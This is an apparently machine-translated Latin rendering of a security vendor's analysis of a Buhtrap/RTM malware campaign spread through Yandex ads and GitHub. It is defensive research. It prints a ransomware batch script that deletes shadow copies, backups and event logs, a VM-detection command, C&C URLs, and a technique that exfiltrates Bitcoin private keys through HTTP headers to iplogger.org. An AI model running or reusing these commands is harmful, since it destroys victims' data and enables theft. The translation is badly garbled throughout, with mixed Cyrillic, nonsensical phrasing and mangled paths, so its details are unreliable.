Ut tabularios in oppugnatione cyberico oppugnare potes, documenta operantia uti potes quae in online quaerunt. Hoc fere est quod coetus cyber per hos paucos menses egit, notas posticas distribuens. и necnon encryptores et programmatores ob cryptocurrencie. Plurima scuta in Russia sita sunt. Oppugnatio facta est ponendo malas vendo in Yandex.Direct. Potentiales victimae ad unum locum dirigebantur ubi rogabantur ut malivoli limam in specie documenti simulat. Yandex removit malitiosam vendo post nostram monitionem.
Fons codicis Buhtrapae in praeteritis online emanavit quo quis eo uti potest. Nulla notitia de RTM codice disponibilitate habemus.
In hac statione narrabimus tibi quomodo oppugnatores malware usus Yandex.Direct distributi sunt et eum in GitHub hosted. Postes cum technica analysi malware concludet.
Buhtrap et RTM sunt rursus in negotiis
Mechanica propagationis et victimarum
Variae payloads victimis tradendis communem mechanismum propagandi communicant. Omnes tabulae maliciae ab oppugnatoribus creatis in duobus repositoriis GitHub diversae positae sunt.
Typice repositio continebat unum fasciculum malignum downloadabile, quod saepe mutabatur. Cum historiam mutationum repositorium in GitHub inspicere potes, videre potes qualem malware tempus certo distributum sit. Ad victimam convincendam ad limam malignam detrahendam, pagina blanki-shabloni24[.]ru, in figura supra demonstrata, adhibita est.
Consilium situs et omnia nomina malignorum imaginum unam notionem sequuntur - formas, templates, contractus, exempla, etc. Cum considerantes Buhtrap et RTM programmata iam in oppugnationibus tabulariorum in praeteritis usitatas esse, supposuimus consilio in nova expeditione idem. Sola quaestio est quomodo victima oppugnatoribus locum obtinuit.
infectio
Saltem plures victimae potentiales quae in hoc situ finitae sunt attracti a vendo malitioso. Infra exemplum URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Ut videre potes ex nexu, vexillum positum est in foro legitimo bb.f2[.]kz. Gravis est notare vexilla in diversis locis apparuisse, omnes eandem expeditionem id (blanki_rsya) habuisse, et maxime ad officia rationis vel subsidia legalia pertinentia. Domicilium ostendit victimam potentialem adhibitam petitioni "download forma cautionis" quae hypothesin nostram oppugnationum iaculis sustinet. Infra sunt sites ubi apparuerunt vexilla et quaesita quaesita respondentia.
- forma cautionem download - bb.f2 [.] kz
- Sample contractus - Ipopen[.]ru
- application querimonia sample - 77metrov[.]ru
- pactum formae - blank-dogovor-kupli-prodazhi[.]ru
- petitio aulica specimen - zen.yandex[.]ru
- Querela Sample - yurday[.]ru
- Forma contractus Sample - Regforum[.]ru
- contractus forma - assistus[.]ru
- sample apartment pactum - napravah[.]com
- exempla contractuum legalium - avito[.]ru
blanki-shabloni24[.]ru situs fortasse ad simplicem aestimationem visualem transire configuratus est. Typice, ad quod ostendit situs professionalis bellus cum nexus ad GitHub non videtur aliquid manifesto malum esse. Praeterea oppugnatores malignos fasciculos imposuistis ad repositorium solum ad tempus determinatum, in bello verisimile. Frequentius repositorium GitHub vacuum archivi avi vel fasciculi blank EXE continebat. Sic oppugnatores vendo per Yandex.Direct in situs qui maxime verisimile erant visitati tabularii qui venerunt in responsione ad interrogationes specificas.
Deinde videamus varias payloads hoc modo distributas.
Payload Analysis
Chronologia distributionis
Malitiosa expeditio in fine mensis Octobris anno MMXVIII incepit et in scribendo est activa. Cum totum repositum publice in GitHub praesto esset, accuratum tempus distribuendi sex familiarum malware diversarum compilavit (vide infra figuram). Lineam adiecimus ostendens cum nexus vexilli deprehensus est, mensuratus ab ESET telemetria, ad comparationem cum git historia. Ut videre potes, hoc bene pertinet cum paratae solutionis in GitHub. Discrepantia in fine Februarij explicari potest ex eo quod partem historiae mutationis non habuimus quia repositum a GitHub remotum est antequam eam in integrum acciperemus.
Figure 1. Chronologia distributionis malware.
Signing Testimonia
Prouincia plures libellos usi sunt. Nonnullae familiae malware plus quam una signatae sunt, quae adhuc indicat varia exempla ad eandem expeditionem pertinere. Quamvis disponibilitate clavis privatae, operarii binarios systematice non subscribebant nec clavis ad omnia exempla utebantur. Nuper in Februario MMXIX, oppugnatores subscriptiones irritas creare coeperunt utentes libellum Google possessorem cuius clavis privatam non habebant.
Omnes libelli qui in expeditione et familias malware sunt implicatae, in tabula infra recensentur.
His codici etiam usi sumus subscriptione testimonia ut nexus cum aliis familiis malware confirmandis. Pro plerisque libellis exempla non invenimus quae per repositorium GitHub non distributa sunt. Nihilominus testimonium Tov "MARIYA" libellum malware botnet pertinens ad significandum adhibitum est et fossores. Verisimile est hoc malware ad hanc expeditionem referri. Verisimile est testimonium in tenebris empta.
Win32/Filecoder.Buhtrap
Prima pars quae operam nostram deprehendit erat nuper inventa Win32/Filecoder.Buhtrap. Hic fasciculus binarius Delphicus interdum fasciculus est. Maxime in Februario-March MMXIX distributa est. Propositum est ut pretium redemptionis - localem inquirit et retis folders et encryptas detectas inquirit. Non indiget nexu interreti ut decipiatur quia servo encryption claves mittere non potest. Sed "signum" ad finem nuntii redemptionis addit, ac electronicam vel Bitmessage ad operantium contactum suggerit.
Filecoder.Buhtrap ad encryptas quam plurimas facultates sensitivas quam maxime aptas ad filum decurrit ut programmata clavis claudatur quae tractatores tabellae apertas habent in quibus magni pretii notitias quae encryption impedire possent. Processus target sunt maxime systemata datorum procuratio (DBMS). Praeterea Filecoder.Buhtrap fasciculos stipes delet et tergum ut difficilis notitia recuperationis faciendi. Ad hoc batch scriptum infra currunt.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap legitimo online IP Logger inserviens utitur ad informationes colligendas de visitatoribus website. Hoc destinatur indagare victimas redemptionis, quae est penes lineam mandati;
mshta.exe "javascript:document.write('');"
Files encryption eliguntur si tres exclusiones indices non congruunt. Primo, fasciculi sequentes extensiones non sunt encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys et .bat. Secundo excluduntur omnes tabulae quibus plena semita contineat chordas directorium ex indice infra.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Tertio, quaedam nomina fasciculi ab encryptione excluduntur, in iis tabella nomine redemptionis nuntius. Elenchus infra exhibetur. Patet, omnes hae exceptiones ad machinam currendam, sed minimo cursui servandae destinantur.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
File encryption ratio
Postquam supplicium, malware generat 512 frenum RSA clavem par. Exponens privatum (d) et modulum (n) tunc encryptae sunt clavem publicam (exponentis et moduli publici (exponentis et moduli publici) 2048-bit, et base 64 encoded. Codex auctor huius in Figura 2° ostenditur.
Figura 2. Proventus Hex-radiorum compilatio 512 frenum RSA clavis par processui generationis.
Infra exemplum est textus plani cum clavis privatis generatae, cuius signum est nuntium redemptionis adnectitur.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Clavis publica oppugnantium infra datur.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Tabulae encryptae sunt utens AES-128-CBC cum 256 clavis frenum. Pro singulis fasciculis encryptatis, clavis nova et vector initializationis nova generantur. Clavis notitia ad finem lima encrypted additur. Videamus formam encrypted lima.
Encrypted files habent sequentia header:
Fons tabellae datae cum additis valoris magicae VEGA ad primum 0x5000 bytes encryptus est. Omnes decryption informationes lima coniuncta cum hac structura;
- Tabella amplitudo titulum continet notam significans num tabella maior quam 0x5000 bytes in magnitudine
— AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, clavis publicus generati RSA clavem par))
- RSA clavis blob = ZlibCompress(RSAEncrypt(generatae RSA clavis privata, clavis publica RSA dura-coded))
Win32/ClipBanker
Win32/ClipBanker pars est quae intermittas ab exeunte Octobri ad mane Decembri MMXVIII distributa. Munus eius est monitorem argumentorum clipboard, inscriptiones cryptocurrency perarum quaerit. Inscriptio pera scopo constituto, ClipBanker reponit cum inscriptione quae operariorum credita est. Exempla elaborata nec cohibenti nec obfuscata fuerunt. Sola mechanism ad mores larva encryption est filum. Inscriptiones crumenae operantis encryptae sunt utens RC2018. Scopum cryptocurrencies sunt BitCoin, BitCoin nummi, Dogecoin, Ethereum et Ripple.
Per tempus malware crumenam oppugnatoribus Bitcoin diffundebat, parva copia VTS missa est, quae de successu belli dubitationem eiicit. Accedit, quod non est documentum innuere has res ad ClipBanker omnino relatas esse.
Win32/RTM
Pars Win32/RTM pars compluribus diebus in primo Martio MMXIX distributa est. RTM est argentarium Troianum in Delphis scriptum, in remotis systematibus argentariis destinatum. In 2019, investigatores ESET editorum huius programmatis descriptio adhuc pertinet. Mense Ianuario MMXIX, Palo Alto Networks etiam dimisit .
Buhtrap Loader
Aliquamdiu receptator in GitHub praesto fuit qui instrumentis Buhtrap praeviis non erat. Et vertit ad https://94.100.18[.]67/RSS.php?<some_id> ut deinceps scaenam in memoriam reducat et onerat protinus. Duos mores secundi gradus codicis distinguere possumus. In primo URL, RSS.php posticum Buhtrap directe transegit - hoc posticum simillimum est illi qui praesto postquam fons codici emanavit.
Interestingly complures expeditiones cum postico Buhtrap videmus et a diversis operariis assertae currunt. In hoc casu maxima differentia est quod posticum directe in memoriam oneratur et non utitur consilio consueto cum processu instituti DLL, quem de nobis locuti sumus. . Praeterea operatores RC4 clavem mutaverunt ad encrypt negotiationis retis cum servo C&C. In plerisque expeditionibus vidimus, operariorum clavem mutare non molesti sunt.
Secundum, mores implicatiores erat quod URL RSS.php alteri oneratus est. Eam obfuscatione aliqua implevit, ut reaedificationem dynamicam import table. Propositum bootloader est cum servo C&C contactum [.]com/api/F27F84EDA4D13B15/2, ligna mitte et responsum exspecta. Responsum procedit ut STILLA, eam in memoriam onerat ac perficit. Stipendium hoc oneratus videbamus erat posticum Buhtrap idem, sed alia membra esse possunt.
Android / Spy.Banker
Interestingly, componentia Android etiam inventa in reposito GitHub fuit. Erat in praecipuo genere unius tantum diei - November 1. MMXVIII. Praeterquam quod in GitHub collocatum est, ESET telemetria nullum argumentum huius malware distributae invenit.
Compositio est hosted in Package Android Application (APK). Graviter obfuscatur. Mores malitiosos latet in URNA encryptata in APK sita. Encrypted cum RC4 hoc clavem utens:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Eadem clavis et algorithmus ad chordas encryptas adhibentur. URNA sita est APK_ROOT + image/files. Prima tabella 4 bytes continet longi- tudinem encryptae URNA, quae statim post longi- tudinem agri incipit.
Cum decrypta tabella, inspeximus Anubis antea fuisse argentarium Android. Malware has notas sequentes:
- tortor ligula
- taking eenshotsscray
- questus GPS coordinatas
- keylogger
- fabrica notitia encryption et pretium postulatio
- mittens spam
Interestingly, argentaria Twitter usus est ut canalis communicationis tergum ut alium C&C obtineat. Specimen quod explicavimus ratione usus est @JonesTrader, sed tempore analysi iam impeditum est.
Argentarius indicem continet applicationum scoporum in fabrica MASCULINUS. Longior est quam catalogus in sophorum studio. Elenchus plures applicationes argentarias includit, programmata electronica shopping sicut Amazon et eBay, ac cryptocurrency officia.
MSIL/ClipBanker.IH
Novissima pars in hanc expeditionem distributa fuit .NET Windows exsecutabile, quod mense Martio MMXIX apparuit. Pleraque versionum investigatorum cum ConfuserEx v2019 fasciculatae sunt. Sicut ClipBanker, haec pars clipboard utitur. Propositum eius est amplis cryptocurrencies, sicut vapori offert. Accedit, utitur IP Logger opera ut clavem WIF BitCoin privatim surripiat.
Praesidium Mechanismi
Praeter beneficia quae ConfuserEx praebet in prohibendo debugging, dumping et sollicitare, component facultatem comprehendendi productorum antivirorum et machinis virtualis.
Ad comprobandum quod in machina virtuali currit, malware fabricato in Windows WMI linea (WMIC) utitur ad informationem BIOS petendam, scilicet:
wmic bios
Progressio deinde parses praecepti output et keywords quaerit: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Ad deprehendere products antivirus, malware instrumentum in Fenestra Management (WMI) petentibus utens Fenestra Securitatis Centre ManagementObjectSearcher API ut infra. Post decoctionem a base64 vocationi similis est:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Processus cognoscendi antivirus producta.
Praeterea malware num instrumentum, ut contra impetus clipboard muniatur et, si currit, omnia stamina in eo processu suspendat, inde tutelam inactivare.
Perseverantia
Malware versionem in se codices studuimus %APPDATA%googleupdater.exe et ponit "absconditum" attributum pro directorio google. Tum valorem mutat SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in Fenestra subcriptio et adiungit viam updater.exe. Hoc modo perficietur malware usor omni tempore tigna in.
Malignus mores
Sicut ClipBanker, monitores malware contenta clipboard et cryptocurrency scrip electronica quaerit, et cum inventa, reponit una cum inscriptionibus operatorum. Infra index inscriptionum electronicarum est secundum ea quae in codice inveniuntur.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Ad unumquodque genus inscriptionis est expressio debita regularis. Valor STEAM_URL ad vaporem systematis oppugnandum adhibetur, ut videri potest ex expressione regulari quae in quiddam definire adhibetur:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Canalis exfiltration
Praeter inscriptiones reponendas in quiddam, claves malware privatas WIF BitCoin, Core Bitcoin et Electrum BitCoin peraverant. Propositum plogger.org utitur ut canalem exfiltration ad WIF clavis privatam obtinendam. Ad hoc faciendum, operariorum notitias clavis privatas ad caput HTTP User-Agentis addunt, ut infra patebit.
Figure 4. IP Logger console with output data.
Operatores iplogger.org ad peras filtrandas non utebantur. Verisimile est confluebant ad alium modum ex 255 charactere limite in agro User-Agentin IP Logger interface exhibetur. In exemplis studuimus, alter output servo in ambitu variabili repositum est DiscordWebHook. Mirum, hic ambitus variabilis nullibi in codice assignatur. Hoc suggerit malware adhuc sub evolutione et variabilis machinae probatae operantis assignari.
Aliud signum est propositum in evolutione esse. Fasciculus binarius duos iplogger.org URLs includit, et utrumque queritur cum notitia exfiltratur. Petentibus alicui ex his URLs, pretium in Relatore campum antecedit "DEV /". Etiam versionem invenimus quae non utens ConfuserEx packaged est, recipiens pro hoc domicilio nominatur DevFeedbackUrl. Fundatur in ambitu nominis variabilis, credimus operarios parare uti legitimo servitio Discordiae eiusque interceptionis systematis telae ut cryptocurrency reticulis surripiat.
conclusio,
Haec expeditionis exemplum est usus legitimae venditionis officiorum in cyber- nis oppugnationibus. Consilium Instituta Russica petant, sed mirum non essemus talem impetum utentes officia non-Russiana videre. Ad evitandum compromissum, utentes fidentes esse debent famae fontis programmatum download.
Index completorum indices compromissi et Miter ATT&CK attributorum is available at .
Source: www.habr.com